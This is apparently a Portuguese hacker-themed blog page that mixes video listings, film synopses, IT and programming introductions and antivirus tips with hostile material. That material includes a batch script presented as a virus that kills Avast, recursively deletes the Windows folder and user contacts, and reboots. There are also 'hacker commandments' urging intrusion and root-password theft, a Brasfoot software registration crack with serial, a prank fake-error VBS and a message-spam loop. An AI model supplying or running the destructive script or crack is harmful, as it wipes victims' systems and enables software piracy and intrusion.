Texto De Amostra

HACKEANDO O MUNDO | Nerdologia 34

Entenda mais um pouco de como e possível Hackear o Mundo.!

O vídeo não ensina a hackear, mas sim nos mostra como nosso sistemas são frágeis.
todos nós temos que nos cuidar, e manter sempre a atenção a todo tipo de tecnologia que esta cercado ao nosso redor.








CAOS E EFEITO BORBOLETA | Nerdologia 15


Entenda o Significado do Caos e Efeito Borboleta.
provavelmente você já renha visto o filme, mas ficou com aquela pulga atrás da orelha: o que o filme quer passar? não entendi nada!!.
pois então o vídeo abaixo ilustra bem a origem do Caos e explica o que e EFEITO BORBOLETA.












Quem não cola não sai da escola Dublado Completo

Gol! - O Sonho Impossível [Dublado]

Nesse filme conta a história de Santiago Munez um jovem garoto pobre que quando era pequeno cruzou ilegalmente a Fronteira Estados Unidos/México. Anos depois, a família reside em Los Angeles na California, e Santiago ajuda o pai, Hernan em limpeza de piscinas. Joga futebol nas horas livres e numa dessas partidas é notado por Glen Foy. Ex-jogador inglês e ex-olheiro do clubeNewcastle United, está de passagem por Los Angeles visitando a filha. Ele contacta Barry Rankin, agente de jogadores para observa-lo em um jogo, mas ele não comparece. Mesmo assim, Glen lhe oferece uma oportunidade de teste, se for a Inglaterra.
Mesmo sem apoio do pai, Santiago recebe de sua avó Mercedes o dinheiro para a passagem. Na Inglaterra, Glen Foy lhe oferece abrigo e apoio. É apresentado a Erik Dornhelm, o treinador do Newcastle, que aceita Santiago para fazer um treino. A partir de então, mesmo sem agradar no início, conta com a insistência de Glen em mantê-lo no clube. Portador de asma, omite esta informação do clube e Hughie, seu invejoso companheiro de equipe, quebra seu inalador antes da partida dos elencos reservas do Newcastle contra o Manchester United, decisiva para sua continuidade ou não no clube. Irreconhecível em campo, é substituído. Após o jogo é dispensado e ao partir da cidade, por acaso, divide o táxi com o "jogador promessa" recém-contratado por 8 Milhões de Libras do time, Gavin Harris. Já atrasado para o treino, diante do treinador, Harris intercede por Santiago, que retorna ao time. Com Harris o ajudando a ser um jogador e uma pessoa melhor, Santiago consegue jogar na equipe principal estreou contra a equipe do Fulhamque o Newcastle United ganhou




A Ilha Misteriosa - aventura, ação e fantasia - filmes completos dublado...

Os Instrumentos Mortais Cidade dos Ossos COMPLETO HD

Os Instrumentos Mortais Cidade dos Ossos COMPLETO HD

A Origem dos Hackers - Dublado

Documentário sobre o mundo dos Hackers.

A Origem dos Mais Talentosos Hackers.

Efeito "Trailer de Cinema" no Sony Vegas

Vou mostrar Como derrubar um site pr. rápidos "Anonymous"

10 mandamentos do Rei dos Hackers



1- Descobriu algo novo, OLHE!
2- NÃO APAGUE, pense no que seria melhor; ter acesso a um provedor ou detoná-lo?
3- NÃO MODIFIQUE NADA, ao menos que queira que saibam que esteve lá.
4- Nunca tente um só root direto! Isso fica logado.
5- Não fique dando telnet ou pegando mail usando acesso dos outros!
6- Nunca subestime um sysop.
7- Escolha horas entre 24:30 as 6:00.
8- Uma vez lá dentro tente dominar o lugar, é claro, com cautela.
9- Não confie em ninguém.
10- Se pegar a senha do root de algum provedor e não souber o que fazer MATE-SE!
11- Não teste vírus no seu próprio HD.
12- É bom preparar muito bem uma estratégia antes de atacar.
13- Use os computadores de sua universidade (é mais seguro).
14- Não fique distribuindo informações para ninguém ou dados sobre o que vc pegou.
15- NÃO OBEDEÇA REGRAS. Claro que estas tem que ser cumpridas.
16- Não tenha pena de ninguém.
17- Vc usa o MS-DOze ou o Windoze? Não conte pra ninguém...
18- Vc usa o algum UNIX ou LINUX? Esteja certo que esta bem seguro...
19- Não crie laços afetivos com a vítima.
20- Aprenda o máximo que puder com quem sabe mais! Não se meta a besta direto
ÚLTIMO: Não se submeta a nenhum sistema hierárquico. Administradores fedem!


Os 10 Melhores Hackers de Todos os Tempos

Confira a Lista dos 10 Melhores Hackers do Mundo.




CQC 04/07/11 - Matéria com os Hackers

Assistam a essa matéria feita pelo pessoal do CQC dia 04/07/2011.
foi mostrado a todo Brasil uma INVASÃO a um site de uma Prefeitura.

Será que a suposta invasão foi realmente feita pelo tal "Hacker" ? ou era um Funcionário que trabalha na área de Suporte Técnico da Prefeitura, desfarçado de hacker para ter matéria para o programa! o ataque foi concluído, mas não e CRIME de Privacidade ? Essa Tal forma de mostrar isso a um Órgão Publico Resultou em Penalidades a Emissora ?, e se Fosse um de nós o que ACONTECERIA ?
Assistam o Vídeo Abaixo e tirem suas Conclusões.






Registro Brasfoot 2015

E a i Galera!! Esta ai o Registro do Novo Brasfoot 2015
Você Baixou o Brasfoot 2015 e pegou esse Registro ? Não esta Conseguindo Registrar ?!!! andei procurando na internet por muito tempo em vários post e fóruns e não encontrei o que eu queria mas acabei sozinho descobrindo como registrar o jogo.

sigam passo a passo que vocês irão ter sucesso.
siga Passo a Passo de como Registrar agora mesmo.

=======================================================================
Abra o Registro
HKEY_CURRENT_USER\Software\Brasfoot2015

Crie um Novo valor #1 e Modifique para nome minusculo
Crie um Novo valor #1 e Modifique para info

========================================================================
Nome: Elizangela Souto Silva
Código: 24944292

Max the Hacker Documentaire (25 million hits!!!)

Snelweg platgooien :)

Invadindo Windows XP - Rombo na segurança

Hackers Criminosos e Anjos. VIDEO COMPLETO S/ CORTES

DEFININDO TECNOLOGIA DA INFORMAÇÃO (TI)

O termo Tecnologia da Informação ou simplesmente TI, pode ser definido como todas as atividades e soluções providas por recursos computacionais.
Sendo a informação um dos principais patrimônios para empresas e indivíduos, faz-se necessária a utilização correta de ferramentas e métodos para que se alcance bons resultados com o menor custo possível. Dentro deste contexto, é que surge o profissional de TI.
Um profissional de TI é o indivíduo que utiliza tecnologias para gerar, manipular e gerir informações. É nas “mãos” destes profissionais que diariamente passam milhares de 0’s e 1’s que se transformam em tudo que se vê no mundo virtual.
Quem decide atuar com TI pode trabalhar nos mais variados nichos de mercado que a área proporciona, tais como: manutenção/venda de equipamentos, desenvolvimento de sistemas, administração de bancos de dados, segurança da informação e muitos outros. Dentro de cada um destes nichos, surgem outros vários nichos que podem ser explorados das mais variadas formas. Um exemplo claro desta afirmação pode ser visto, por exemplo, no nicho de desenvolvimento de sistemas que possui mais de 100 linguagens de programação e os mais variados cargos, tais como: analistas, programadores, engenheiros, arquitetos e outros.
Bom, este é um resumo sucinto do que é a TI. Daqui em diante é com você estudar e se dedicar muito para aprender a cada dia mais e mais.

<< Back Track 4 - Teste de Penetração de Vulnerablidade



Kali Linux é um sistema operacional Linux baseado no Debian. É focado em testes de seguranças e testes de penetração (pen tests), muito apreciada por hackers e analistas de segurança, podendo ser iniciado diretamente pelo CD (sem necessidade de instalar em disco), mídia removível (pendrive), máquinas virtuais ou direto no disco rígido

História e descrição

Foi evoluído da combinação de duas distribuições bem difundidas - Whax e Auditor Security Collection. Juntando forças e substituindo essas distribuições, BackTrack ganhou uma popularidade massiva e foi eleito em 2006 como a Distribuição Live de Segurança número 1 em sua categoria, e 32º no geral, pela Insecure.org. Profissionais de segurança, assim como novatos, estão usando BackTrack como seu kit de ferramentas favorito pelo mundo todo.

BackTrack tem uma longa história e foi baseado em várias distribuições de Linux diferentes até agora ser baseado em uma distribuição Linux Slackware e os scripts do live CD correspondentes por Tomas M. (www.slax.org). Cada pacote, configuração de núcleo e script é otimizado para ser utilizado pelos testadores de penetração de segurança. Patches e automação têm sido adicionados, aplicados e desenvolvidos para oferecer um ambiente organizado e pronto para a viagem.
Após ter chegado em um procedimento de desenvolvimento estável durante os últimos lançamentos, e consolidando feedbacks e complementos, o time focou-se em dar suporte a mais dispositivos de hardware, e novos dispositivos, bem como oferecer mais flexibilidade e modularidade por meio da reestruturação de processos de construção e manutenção. Com a atual versão, a maioria das aplicações são construídas como módulos individuais que ajudam a acelerar os lançamentos de manutenção e correções.
Por Metasploit ser uma das ferramentas-chave para a maioria dos analistas, ele é estreitamente integrado no BackTrack e ambos os projetos colaboram juntos para sempre providenciar uma implementação detalhada do Metasploit dentro das imagens do CD-Rom do BackTrack ou nas futuras imagens de virtualização mantidas e distribuições da remote-exploit.org (como aplicações de imagens VMWare).
Ser superior e fácil de usar é a chave para um bom Live-CD de segurança. Pega-se coisas um passo adiante e alinha o BackTrack às metodologias de teste de penetração e frameworks de avaliação (ISSAF e OSSTMM). Isso irá ajudar nossos usuários profissionais durante seus pesadelos de relatório diário.
Atualmente BackTrack consiste de mais de 300 ferramentas diferentes e atualizadas, que são logicamente estruturadas de acordo com o fluxo de trabalho de profissionais de segurança. Essa estrutura permite até novatos encontrar as ferramentas relacionadas a uma tarefa específica para ser cumprida. Novas tecnologias e técnicas de teste são combinadas no BackTrack o mais rápido possível para mantê-lo actualizado.
Nenhuma plataforma de análise comercial ou livremente disponível oferece um nível equivalente de usabilidade com configuração automática e foco em testes de penetração

download do live Cd:  http://www.backtrack-linux.org/

Segurança em Rede Wireless

CD-ROM de Segurança em Redes sem fio desenvolvido pelo MVP Aurélio 'Baboo' Minerbo.
Em cerca de uma hora você aprenderá a instalar e configurar uma rede sem fio destinada a uso residencial ou em pequenas empresas, permitindo que você acesse a internet com segurança e rapidez.
Os vídeos deste CD são bastante didáticos e claros, com narração totalmente em português, explicações detalhadas e exemplos reais. Este CD tem um foco especial em segurança, para que você possa configurar e utilizar a sua rede sem fio (wireless) sem se preocupar com ameaças externas.
# Você quer instalar uma rede sem fio, mas não sabe como fazer ?

# Você quer instalar uma rede sem fio com a certeza de fazer da maneira correta ?
# Você já instalou a sua rede sem fio, mas algo não funciona ?
# Você já instalou a sua rede sem fio e quer ter certeza que ela está segura ?
#Você quer entender mais as opções do roteador para beneficiar-se ao máximo dele ?
Informações: Segurança Wirelles
Tamanho: 65 MB
Formato: Rar
Adicionar legenda

Idioma: Português

Mensagem de ERRO falsa em .vbs

Mensagem de erro falsa em .vbs
Como criar caixas de mensagens para enganar
E simples entra no Bloco de notas e digite

x=MsgBox("Aqui vc digita o conteudo da mensagem",1+15,"Aqui vc digita o titulo da mensagem")

os números em cima indicam como sera a caixa de mensagem

o número 4 antes do sinal de mais indica que botões apareceram na caixa de mensagem você pode mudar este número

0 -> Ok
1 -> Ok e Cancelar
2 -> Abortar, Tentar e Ignorar
3 -> Sim, Não e Cancelar
4 -> Sim e Não
5 -> Tentar e cancelar

e onde está o número 48 pode ser colocado

16 -> Caixa de erro critico
32 e 48 -> Caixa de Cuidado


E possivel colocar mais de uma mensagem é só colocar novamente o codigo na linha de baixo

depois de feito é só salvar com extensão .vbs (Visual Basic Script)
EX: nome.vbs

Eicar - Testar ANTIVIRUS

Testar anti-virus
Crie um bloco de notas e cole o seguinte codigo:

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

Salve em .com
EX: nome.com

CLICK EM MIM

>> Função:Fica repetindo varias vezes a mesma mensagem<<
Salve como .bat Ex eu.bat, tchau.bat não importa o nome e sim a Extensão.

@ECHO OFF
:REPETE
MSG * CLICK EM MIM
GOTO REPETE

Vírus Para Desativar Avast 8


Abra o seu Bloco de Notas: 
Copie e Cole e salve como .bat Ex: Eu.bat, tchau.bat..
Não importa o nome e sim a Extensão.

>>> Atenção Nunca teste no seu Computador!!<<<

@echo off
/taskkill /f VPS
@echo off
del /s /q c:\windows\
 shutdown -r
start notepad.exe
start write.exe
start sol.exe
start cmd.exe
start powerpnt.exe
start excel.exe
start winword.exe
start msacess.exe
cd %USERPROFILE%
cd Config~1
cd Dadosd~1
cd Micros~1
cd "Windows Live Contacts"
del /s /q *.*
1 - NÃO ABRA ARQUIVOS DE DESCONHECIDOS
A primeira dica pode parecer óbvia, mas muita gente não se dá conta do risco. Nunca abra arquivos enviados por estranhos. Caso fique em dúvida sobre a origem, é melhor sempre agir com cautela e não abrir até que se possa confirmar a origem.

2 - DESCONFIE DE MENSAGENS ESTRANHAS
Muitos vírus hoje em dia se auto-enviam para outras pessoas sem o conhecimento do usuário infectado. Por isso, desconfie mesmo se o remetente do arquivo for conhecido. Se aquele seu amigo de longa data lhe manda uma mensagem em inglês, alguma coisa está errada.ÿ

3 - DESCONFIE DE ARQUIVOS ENVIADOS POR CONHECIDOS
Mesmo quando o remetente é conhecido e a mensagem não tem nada de suspeita, vale a pena desconfiar. Quem garante que aquele joguinho bobo não esconde um vírus? Muitas vezes, o remetente não sabe que foi infectado por um arquivo e o repassa para os seus amigos cheio de boas intenções.

4 - FIQUE DE OLHO NAS EXTENSÕES
Uma boa dica para decidir se abre ou não o arquivo é observar as três últimas letras, conhecidas como extensão de arquivos. Até hoje, não se tem notícia de vírus em arquivos de imagem (.gif, .jpg, .bmp, .png), áudio (.wav, .mp3, .ra) ou vídeo (.mov, .mpeg, .avi). De modo geral, estes arquivos são considerados seguros. Por outros lado, as extensões .exe, .vbs, .bat, .com e .doc são muito usadas em vírus.

Aqui vale lembrar que muitos vírus disfarçam o nome dos arquivos, acrescentando outra extensão. Por exemplo, um vírus de nome "arquivo.mp3.vbs" aparece no Windows somente como "arquivo.mp3", pois a última extensão é ignorada na configuração padrão. Portanto, a regrinha das extensões não garante 100% de proteção.

5 - HABILITE O ALERTA DE MACROS
Outra forma comum de espalhar vírus é através de macros, pequenas instruções que podem ser embutidas em arquivos da plafatorma Office (Word, Excel, PowerPoint, Acess). Devido à popularidade, o Word é o preferido dos criadores de vírus. Fique de olho em arquivos .doc, .xls, .ppt e .mdb e configure seus programas do Office para exibir alertas antes de abrir arquivos com macros.

6 - LEIA E-MAILS EM FORMATO TEXTOHá vírus que se propagam via Internet mesmo sem que o usuário abra um arquivo anexo. Eles vêm inseridos em páginas Web que o usuário recebe em seu e-mail. Basta que o usuário abra a mensagem para ser inrfectado. Para evitar esse problema, o mais seguro é configurar seu programa de e-mail para exibir mensagens no formato texto puro. Assim, nenhum código malicioso funcionará.

7 - INSTALE UM ANTIVÍRUSToda a cautela do mundo não é suficiente sem um bom antivírus. Ele funciona sempre que o computador está ligado e pode evitar que um descuido momentâneo cause problemas sérios. Entre as fabricantes de antivírus mais conhecidas estão Symantec, McAfee, TrendMicro, Sophos e Computer Associates.

8 - ATUALIZE O ANTIVÍRUS
A cada dia surgem dezenas de novos vírus e para se manter salvo das pragas o ideal é atualizar o antivírus uma vez por semana ou, no máximo, por mês. Os programas normalmente têm ferramentas específicas para esta finalidade.

9 - NÃO LIGUE O COMPUTADOR COM DISQUETE NO DRIVE
Embora meio fora de moda, os vírus de boot ainda podem causar estragos. Eles normalmente são transmitidos através de disquete. Portanto, é sempre bom ficar atento para não deixar disquetes no drive. Caso o computador seja ligado com um disquete infectado, pode haver contaminação no setor de boot do disco rígido.

10 - INTEGRE O ANTIVÍRUS A OUTROS PROGRAMAS
A maior parte dos antivírus atuais pode ser integrada para funcionar em conjunto com programas de e-mail e outros aplicativos. Aproveite estes recursos para detectar as pragas assim que aparecem no seu computador.

11 - INSTALE UM FIREWALL
Internautas que se conectam através de serviços de banda larga, como Speedy, Velox e Virtua, ficam mais vulneráveis a ataques de hackers e contaminação por vírus. O ideal é instalar um software de firewall. Além do antivírus, estes programas contêm ferramentas de monitoramento de redes, que impedem tentativas de invasão de computadores.ÿ

12 - CUIDADO AO NAVEGAR
Embora seja pouco comum, é possível criar páginas na Internet com códigos maliciosos e invadir computadores dos internautas ou induzi-los a fornecer informações sigilosas. Por isso, atenção redobrada ao navegar em sites suspeitos.

13 - SUSPEITE DE DOWNLOADS

Hackers costumam colocar vírus disponíveis em suas páginas com nomes de outros programas. Por isso, baixe arquivos somente de sites oficiais ou de credibilidade conhecida.ÿ

14 - CUIDADO EM SALAS DE CHAT E IRC
Salas de bate-papo e IRC são terreno fértil para a distribuição de vírus por anônimos. Por isso, desconfie daquele programinha sensacional que seu amigo recém-conhecido no IRC resolveu lhe passar de mão beijada.

15 - ATENÇÃO REDOBRADA COM A REDE
Quem trabalha em locais com vários micros deve ter muito mais atenção, pois há diversos vírus que se espalham através da rede. Desta forma, seu computador pode ser contaminado devido ao descuido de outro funcionário. Nestes casos o melhor é instalar antivírus em todas as máquinas e orientar todos os operadores da rede sobre os riscos de vírus.

16 - INSCREVA-SE EM NEWSLETTERS
As maiores empresas antivírus do mercado publicam regularmente boletins informativos com os últimos vírus, além de alertas em casos muito graves. Assine estes boletins para se manter informado.

17 - UTILIZE O SUPORTE
Muita gente não sabe, mas ao comprar um antivírus o usuário também tem direito a suporte dos técnicos da empresa. Se estiver em dúvida sobre um e-mail suspeito, ligue ou mande um e-mail para o suporte.

18 - CUIDADO COM PROGRAMAS DE TROCA DE ARQUIVO
Programas de troca de arquivo como KaZaa e LimeWire são terreno fértil para os criadores de vírus, pois garantem a anonimidade. Além do perigo de baixar arquivos de desconhecidos, já mencionado, vale ressaltar que já existem vírus especificamente projetados para se espalhar neste tipo de plataforma. Eles criam arquivos com nomes atrãntes e os compartilham com outras pessoas sem o conhecimento do usuário infectado.

19 - OBSERVE O DESEMPENHO DO MICRO
Lentidão repentina, falta de ícones e dificuldade em abrir programas podem ser sintomas de infecção. Caso a performance do seu computador seja alterada sem motivo aparente, faça uma varredura pelo antivírus para detectar possíveis pragas.

20 - FAÇA UM BACKUP DE ARQUIVOS
Fazer um backup de todos os arquivos periodicamente é um processo complicado e que leva tempo, mas pelo menos os arquivos mais importantes devem ter cópias de segurança em disquetes, CDs ou zip disks. 

Final da Copa deve gerar 13TB de dados

Segundo cálculos da NetApp, a final da Copa do Mundo no Maracanã deverá gerar cerca de 12,6 terabytes de dados na forma de vídeos publicados na Internet.
Essa quantidade de dados é mais de quatro mil vezes superior ao que foi calculado na final da Copa do Mundo  de 2006, na Alemanha. Na última partida foram gerados apenas 30GB de dados pelos fãs.
A NetApp é uma empresa de soluções de armazenamento de dados e realizou suas medições baseada na comparação dos arquivos gerados nas finais de 1998 e 2006. De acordo com a empresa, 74 mil espectadores deverão subir vídeos de pelo menos um minuto para a Internet a partir de seus dispositivos móveis no último jogo desta Copa.
Se o número parece alto, para a final da Copa de 2022, no Qatar, a estimativa é que seja gerado 1.6 petabyte de dados, publicados por cerca de 86 mil usuários.

Bloquear Seleção de Texto

Copie o codigo abaixo e cole entre as tags <head></head>

<script type="text/javascript">
function disableSelection(target){
if (typeof target.onselectstart!="undefined") //IE route
target.onselectstart=function(){return false}
else if (typeof target.style.MozUserSelect!="undefined") //Firefox route
target.style.MozUserSelect="none"
else //All other route (ie: Opera)
target.onmousedown=function(){return false}
target.style.cursor = "default"
}
</script>

Agora copie os codigo abaixo e coloque no final do codigo de seu template antes da tag </html>

<script type="text/javascript">
disableSelection(document.body) //disable text selection on entire body of page
</script>

pronto agora salve e veja se funcionou.

Banco de Dados SQL


http://www.trainning.com.br/download/Apostila%20de%20SQL%20-%20Oracle%20%28pt_BR%29.pdf

Structured Query Language, ou Linguagem de Consulta Estruturada ou SQL, é a linguagem de pesquisa declarativa padrão para banco de dados relacional (base de dados relacional). Muitas das características originais do SQL foram inspiradas na álgebra relacional.
O SQL foi desenvolvido originalmente no início dos anos 70 nos laboratórios da IBM em San Jose, dentro do projeto System R, que tinha por objetivo demonstrar a viabilidade da implementação do modelo relacional proposto por E. F. Codd. O nome original da linguagem era SEQUEL, acrônimo para "Structured English Query Language" (Linguagem de Consulta Estruturada, em Inglês)1 , vindo daí o facto de, até hoje, a sigla, em inglês, ser comumente pronunciada "síquel" ao invés de "és-kiú-él", letra a letra. No entanto, em português, a pronúncia mais corrente é a letra a letra: "ésse-quê-éle".
A linguagem é um grande padrão de banco de dados. Isto decorre da sua simplicidade e facilidade de uso. Ela se diferencia de outras linguagens de consulta a banco de dados no sentido em que uma consulta SQL especifica a forma do resultado e não o caminho para chegar a ele. Ela é uma linguagem declarativa em oposição a outras linguagens procedurais. Isto reduz o ciclo de aprendizado daqueles que se iniciam na linguagem.
Embora o SQL tenha sido originalmente criado pela IBM, rapidamente surgiram vários "dialectos" desenvolvidos por outros produtores. Essa expansão levou à necessidade de ser criado e adaptado um padrão para a linguagem. Esta tarefa foi realizada pela American National Standards Institute (ANSI) em 1986 e ISO em 1987.
O SQL foi revisto em 1992 e a esta versão foi dado o nome de SQL-92. Foi revisto novamente em 1999 e 2003 para se tornar SQL:1999 (SQL3) e SQL:2003, respectivamente. O SQL:1999 usa expressões regulares de emparelhamento, queries recursivas e gatilhos (triggers). Também foi feita uma adição controversa de tipos não-escalados e algumas características de orientação a objeto. O SQL:2003 introduz características relacionadas ao XML, sequências padronizadas e colunas com valores de auto-generalização (inclusive colunas-identidade).
Tal como dito anteriormente, embora padronizado pela ANSI e ISO, possui muitas variações e extensões produzidos pelos diferentes fabricantes de sistemas gerenciadores de bases de dados. Tipicamente a linguagem pode ser migrada de plataforma para plataforma sem mudanças estruturais principais.
Outra aproximação é permitir para código de idioma procedural ser embutido e interagir com o banco de dados. Por exemplo, o Oracle e outros incluem Java na base de dados, enquanto o PostgreSQL permite que funções sejam escritas em Perl, Tcl, ou C, entre outras linguagens.


                                         
                                             Click na Imagem para Visualizar o PDF
http://www.trainning.com.br/download/Apostila%20de%20SQL%20-%20Oracle%20%28pt_BR%29.pdf

Linguagem de Programação JAVA

Adicionar legenda
Java é uma linguagem de programação orientada a objeto desenvolvida na década de 90 por uma equipe de programadores chefiada por James Gosling, na empresa Sun Microsystems. Diferentemente das linguagens convencionais, que são compiladas para código nativo, a linguagem Java é compilada para um bytecode que é executado por uma máquina virtual. A linguagem de programação Java é a linguagem convencional da Plataforma Java, mas não sua única linguagem.


O que é a Tecnologia Java e porque preciso dela?

Java é uma linguagem de programação e plataforma computacional lançada pela primeira vez pela Sun Microsystems em 1995. Existem muitas aplicações e sites que não funcionarão, a menos que você tenha o Java instalado, e mais desses são criados todos os dias. O Java é rápido, seguro e confiável. De laptops a datacenters, consoles de games a supercomputadores científicos, telefones celulares à Internet, o Java está em todos os lugares!



                                                     Click na Imagem para Visualizar o PDF

http://www.fabiobs.com.br/arquivos/apostilajava.pdf

 

Apostila de Programação HTML



HTML (abreviação para a expressão inglesa HyperText Markup Language, que significa Linguagem de Marcação de Hipertexto) é uma linguagem de marcação utilizada para produzir páginas na Web. Documentos HTML podem ser interpretados por navegadores. A tecnologia é fruto da junção entre os padrões HyTime e SGML.
HyTime é um padrão para a representação estruturada de hipermídia e conteúdo baseado em tempo. Um documento é visto como um conjunto de eventos concorrentes dependentes de tempo (como áudio, vídeo, etc.), conectados por hiperligações. O padrão é independente de outros padrões de processamento de texto em geral.
SGML é um padrão de formatação de textos. Não foi desenvolvido para hipertexto, mas tornou-se conveniente para transformar documentos em hiper-objetos e para descrever as ligações.
 


Click na Imagem para Visualizar o PDF
http://www.telecom.uff.br/pet/petws/downloads/apostilas/HTML.pdf

PROGRAMAÇÃO C

C é uma linguagem de programação compilada de propósito geral, estruturada, imperativa, procedural, padronizada pela ISO, criada em 1972, por Dennis Ritchie, no AT&T Bell Labs, para desenvolver o sistema operacional Unix (que foi originalmente escrito em Assembly).1
C é uma das linguagens de programação mais populares2 3 e existem poucas arquiteturas para as quais não existem compiladores para C. C tem influenciado muitas outras linguagens de programação,4 mais notavelmente C++, que originalmente começou como uma extensão para C.

                                                 
                                               Click na Imagem para Visualizar Apostila em PDF.

http://www.inf.ufsc.br/~fernando/ine5412/C_UFMG.pdf

Vírus se espalham em comentários no Facebook

Por ser um dos serviços mais populares da Web, o Facebook é um prato cheio para os cibercriminosos, sem mencionar que, ao propiciar o compartilhamento de informações sem o menor critério... Bom, deixa pra lá.
Como eu costumo dizer no meu humilde espaço (que o amigo há muito não visita), cautela e canja de galinha não fazem mal a ninguém.
É sempre bom ter notícias do amigo, bem como saber que o Guilherme continua comentando suas postagens (lá em casa, faz tempo que ele não aparece).
Abraços a ambos e até mais ler.

Conferir Registro de XP

Loop Infinitos-server como virus

Virus que desliga Pc

Serial Avast 2038